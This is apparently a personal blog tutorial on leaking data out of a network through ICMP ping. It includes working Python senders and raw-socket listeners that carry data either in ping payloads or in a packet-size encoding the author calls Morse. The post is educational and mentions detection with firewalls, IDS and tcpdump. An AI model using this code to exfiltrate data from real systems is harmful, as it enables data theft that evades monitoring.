Data Leakage

Data Leakage using Ping

January 26, 2022

I was reading some articles about ICMP and had this funny idea that it would be possible to perform data leakage using only ping.

Of course I was not the first to have this idea and it's quite an old idea and exploit.

Nevertheless, I personnaly never implemented it and thought that it could be a great opportunity to have some fun and at least something worth coding a bit in Python.

After a bit of thought, I wanted to perform this implementation in two different ways:

General informations:

1- Wikipedia is a very good source of information for what we will achieve here: https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol.

2- This very useful picture of an ICMP packet structure:

ICMP packet

We are going to use the ICMP payload part of the above picture in this implementation.

3- We are going to use Python 3 as a language to develop our idea.

4- We will need the Python library "pythonping".

5- ICMP protocol requires root / admin privileges.

Implementation using variable ICMP packet data:

This part is straight forward and does not require any special thing. We need to make sure that we are not too greedy and put too much data in our ICMP packet.

The maximum size we can use is defined on each network by the MTU (Maximum Transmission Unit). Generally speaking it means that we have 1500 bytes available to put the data we want to leak. Based on experimentation, it's safer to limit it to 1400 bytes. For this reason in my Python code I will limit the MTU to 1400 bytes but feel free to have fun and do your own tests.

Another attention point is that by using the pythonping library we are basically able to SPAM ICMP packet and we want to avoid a Denial Of Service or be too agressive, so let's try to pretend we want to keep a low profile and keep it reasonnable. In my code I set a sleep timer of 0.05 sec (which is already quite agressive) feel free to change it.

Beyond that there's no rocket science. I am going to define:

Enough talking and background explanation.

GIVE ME THE COOODDEEE.

icmpDataSender.py

 from pythonping import ping
import time

class icmpDataSender:
    # default Maximum Transmission Unit is 1500 bytes
    # https://datatracker.ietf.org/doc/html/rfc894
    # default Maximum Segment Size
    # https://datatracker.ietf.org/doc/html/rfc879#section-3
    # MSS size should be MTU - 40 bytes maximum but a safer config due to some
    # router configuration should simply be 1400 or lower
    MSS = 1400
    #Sleep timer to avoid DoS (in sec)
    SLEEP_TIMER = 0.05
    # Destination IP
    dest = ""
    payload = ""

    def __init__(self, dest, payload):
        self.dest = dest
        self.payload = payload

    def sendData(self):
        payloadSegment = []
        if len(self.payload.encode()) > self.MSS:
            size = 0
            while size < len(self.payload.encode()):
                payloadSegment.append(self.payload[size:size + self.MSS])
                size = size + self.MSS
                print(self.payload[size:size + self.MSS])
        else:
            payloadSegment.append(self.payload.encode())

        for segment in payloadSegment:
            ping(self.dest, count=1, payload=segment, verbose=True)
            time.sleep(self.SLEEP_TIMER)

main.py

 from icmpDataSender import *

DEST = "1.1.1.1"
PAYLOAD = "STOP DATALEAKAGE !"

sender = icmpDataSender(DEST, PAYLOAD)
sender.sendData()

listener.py

 import time
import select
import socket
import struct

ERROR_DESCR = {
    1: ' - Note that ICMP messages can only be '
       'sent from processes running as root.',
    10013: ' - Note that ICMP messages can only be sent by'
           ' users or processes with administrator rights.'
    }

data = []

def receiveICMPData(my_socket):
    # Receive the ping from the socket.
    dataSegment = []
    receiving = False
    while True:
        rec_packet, addr = my_socket.recvfrom(1024)
        icmp_header = rec_packet[20:28]
        icmp_type, code, checksum, p_id, sequence = struct.unpack('bbHHh', icmp_header)
        #A print to debug if need be...
        #print("IP:", addr, "ICMP_TYPE=", icmp_type, "CODE=", code, "CHECKSUM=", checksum, "PID=", p_id, "SEQ=", sequence)
        icmp_data = rec_packet[28:]
        print(icmp_data)

try:
    ICMP_CODE = socket.getprotobyname('icmp')
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    s.bind(("", 1))
    while True:
        print("Awaiting data")
        receiveICMPData(s)
except socket.error as e:
    if e.errno in ERROR_DESCR:
        # Operation not permitted
        raise socket.error(''.join((e.args[1], ERROR_DESCR[e.errno])))
    raise  # raise the original error

Execute the listener.py on your endpoint then execute the main.py. The main.py will craft and send the packet using icmpDataSender.py, the listener.py will display the Paylod you've sent.

main.py

listener.py

Et VoilĂ  !

Implementation using ping Morse code:

In this implementation we are going to reuse the same philosophy as above but we define the following standard.

A ping packet having a paylod of size 1 is equal to a "." and a payload of size 2 is equal to a "-". A payload of size 3 is marking the end of transmission. Using this standard we will define a morse class that will take care of translating each character into a succession of "." and "-".

Example, the letter "A" is coded by "....." so we will send 5 ping packet of size 1. The letter "B" is coded by ".-..." we will send 1 packet of size 1, then 1 packet of size 2 and then 3 packets of size 1.

morse.py

 class Morse:
    DICTIONARY = {
        "A": [1,1,1,1,1],
        "B": [1,2,1,1,1],
        "C": [1,1,2,1,1],
        "D": [1,2,2,1,1],
        "E": [1,1,1,2,1],
        "F": [1,2,1,2,1],
        "G": [1,1,2,2,1],
        "H": [1,2,2,2,1],
        "I": [2,1,1,1,1],
        "J": [2,2,1,1,1],
        "K": [2,1,2,1,1],
        "L": [2,2,2,1,1],
        "M": [2,1,1,2,1],
        "N": [2,2,1,2,1],
        "O": [2,1,2,2,1],
        "P": [2,2,2,2,1],
        "Q": [1,1,1,1,2],
        "R": [1,2,1,1,2],
        "S": [1,1,2,1,2],
        "T": [1,2,2,1,2],
        "U": [1,1,1,2,2],
        "V": [1,2,1,2,2],
        "W": [1,1,2,2,2],
        "X": [1,2,2,2,2],
        "Y": [2,1,1,1,2],
        "Z": [2,2,1,1,2],
        " ": [2,1,2,1,2],
        ".": [2,2,2,1,2],
        "?": [2,1,1,2,2],
        "!": [2,2,1,2,2],
        "@": [2,1,2,2,2],
        ",": [2,2,2,2,2]
    }

    def __init__(self):
        pass

    def code(self, words):
        result = []
        for letter in words:
            if str.capitalize(letter) in self.DICTIONARY:
                result.append(self.DICTIONARY[str.capitalize(letter)])
        return result

icmpDataSenderMorse.py

 from pythonping import ping
import time
from morse import Morse

class icmpDataSenderMorse:
    # default Maximum Transmission Unit is 1500 bytes
    # https://datatracker.ietf.org/doc/html/rfc894
    # default Maximum Segment Size
    # https://datatracker.ietf.org/doc/html/rfc879#section-3
    # MSS size should be MTU - 40 bytes maximum but a safer due to some
    # router configuration should simply be 1400 or lower
    MSS = 1400

    #Sleep timer to avoid DoS (in sec)
    SLEEP_TIMER = 0.05

    # Destination IP
    dest = ""

    payload = ""

    def __init__(self, dest, payload):
        self.dest = dest
        self.payload = payload

    def endTransmission(self):
        # An ICMP packet of size 3 is arbitrary defined in the listener as end transmission
        # Sending this random packet of size 3 signal the listener that part of transmission is finish
        # and can assemble and print the data
        ping(self.dest, count=1, size=3, verbose=True)

    def sendMorseData(self):
        #Send Data through ping with packet size 1 or 2 bytes that creates a kind of "morse" format
        morsePayload = Morse().code(self.payload)
        for morse in morsePayload:
            for code in morse:
                ping(self.dest, count=1, size=code, verbose=True)
                # Timer to avoid DoS can be lower, find your own threshold
                time.sleep(self.SLEEP_TIMER)
        #Transmission finished. Send special end transmission packet for listener.
        self.endTransmission()

listenerMorse.py

 import time
import select
import socket
import struct

ERROR_DESCR = {
    1: ' - Note that ICMP messages can only be '
       'sent from processes running as root.',
    10013: ' - Note that ICMP messages can only be sent by'
           ' users or processes with administrator rights.'
}

DICTIONARY = {
    tuple([1,1,1,1,1]): "A",
    tuple([1,2,1,1,1]): "B",
    tuple([1,1,2,1,1]): "C",
    tuple([1,2,2,1,1]): "D",
    tuple([1,1,1,2,1]): "E",
    tuple([1,2,1,2,1]): "F",
    tuple([1,1,2,2,1]): "G",
    tuple([1,2,2,2,1]): "H",
    tuple([2,1,1,1,1]): "I",
    tuple([2,2,1,1,1]): "J",
    tuple([2,1,2,1,1]): "K",
    tuple([2,2,2,1,1]): "L",
    tuple([2,1,1,2,1]): "M",
    tuple([2,2,1,2,1]): "N",
    tuple([2,1,2,2,1]): "O",
    tuple([2,2,2,2,1]): "P",
    tuple([1,1,1,1,2]): "Q",
    tuple([1,2,1,1,2]): "R",
    tuple([1,1,2,1,2]): "S",
    tuple([1,2,2,1,2]): "T",
    tuple([1,1,1,2,2]): "U",
    tuple([1,2,1,2,2]): "V",
    tuple([1,1,2,2,2]): "W",
    tuple([1,2,2,2,2]): "X",
    tuple([2,1,1,1,2]): "Y",
    tuple([2,2,1,1,2]): "Z",
    tuple([2,1,2,1,2]): " ",
    tuple([2,2,2,1,2]): ".",
    tuple([2,1,1,2,2]): "?",
    tuple([2,2,1,2,2]): "!",
    tuple([2,1,2,2,2]): "@",
    tuple([2,2,2,2,2]): ","
}

data = []

def receiveIcmpMorse(my_socket):
    # Receive the ping from the socket.
    dataSegment = []
    receiving = False
    while True:
        rec_packet, addr = my_socket.recvfrom(1024)
        icmp_header = rec_packet[20:28]
        icmp_type, code, checksum, p_id, sequence = struct.unpack('bbHHh', icmp_header)
        #A print to debug if need be...
        #print("IP:", addr, "ICMP_TYPE=", icmp_type, "CODE=", code, "CHECKSUM=", checksum, "PID=", p_id, "SEQ=", sequence)
        icmp_data = rec_packet[28:]
        #print(len(icmp_data))
        if len(icmp_data) == 1 or len(icmp_data) == 2:
            if not receiving:
                print("Receiving data")
                receiving = True
            dataSegment.append(len(icmp_data))
        else:
            print(len(icmp_data))
            print("End packet data received")
            result = ""
            global data
            for d in data:
                result = result + DICTIONARY[tuple(d)]
            print(result)
            data = []
            return
        if len(dataSegment) == 5:
            data.append(dataSegment)
            #print(data)
            dataSegment = []

try:
    ICMP_CODE = socket.getprotobyname('icmp')
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    s.bind(("", 1))
    while True:
        print("Awaiting data")
        receiveIcmpMorse(s)
except socket.error as e:
    if e.errno in ERROR_DESCR:
        # Operation not permitted
        raise socket.error(''.join((e.args[1], ERROR_DESCR[e.errno])))
    raise  # raise the original error

main.py

 from icmpDataSenderMorse import *

DEST = "1.1.1.1"
PAYLOAD = "STOP MORSE DATALEAKAGE !"

senderMorse = icmpDataSenderMorse(DEST, PAYLOAD)
senderMorse.sendMorseData()

That's it! We are all set! EXECUTE.

main_morse.py

listener_morse.py

success

For convenience you can dowload a zip file containing all the above code here.

Conclusion and improvements idea

Let's face it, data leakage using ping as morse code to transfer text is a funny idea.

Some pros and cons around it:

Whereas, data leakage using the variable ICMP data size can be really damaging seeing how fast you can transfer data. Though, correct configuration of firewall or IDS/IPS can prevent this to happen it's not often that I've seen company enforcing such drastic network restriction and even less performing monitoring that deep in their infrastructure. Definitely leaving here a blank space for hackers to be exploited.

Funny exercise also if you are learning: use the above scenario and perform a tcpdump at your router level and notice that you detect the traffic. Then implement basic encryption to hide the payload.

Maybe in a future post about IDS/IPS configuration I will come back to this code and assess detection effort regarding this specific kind of threat.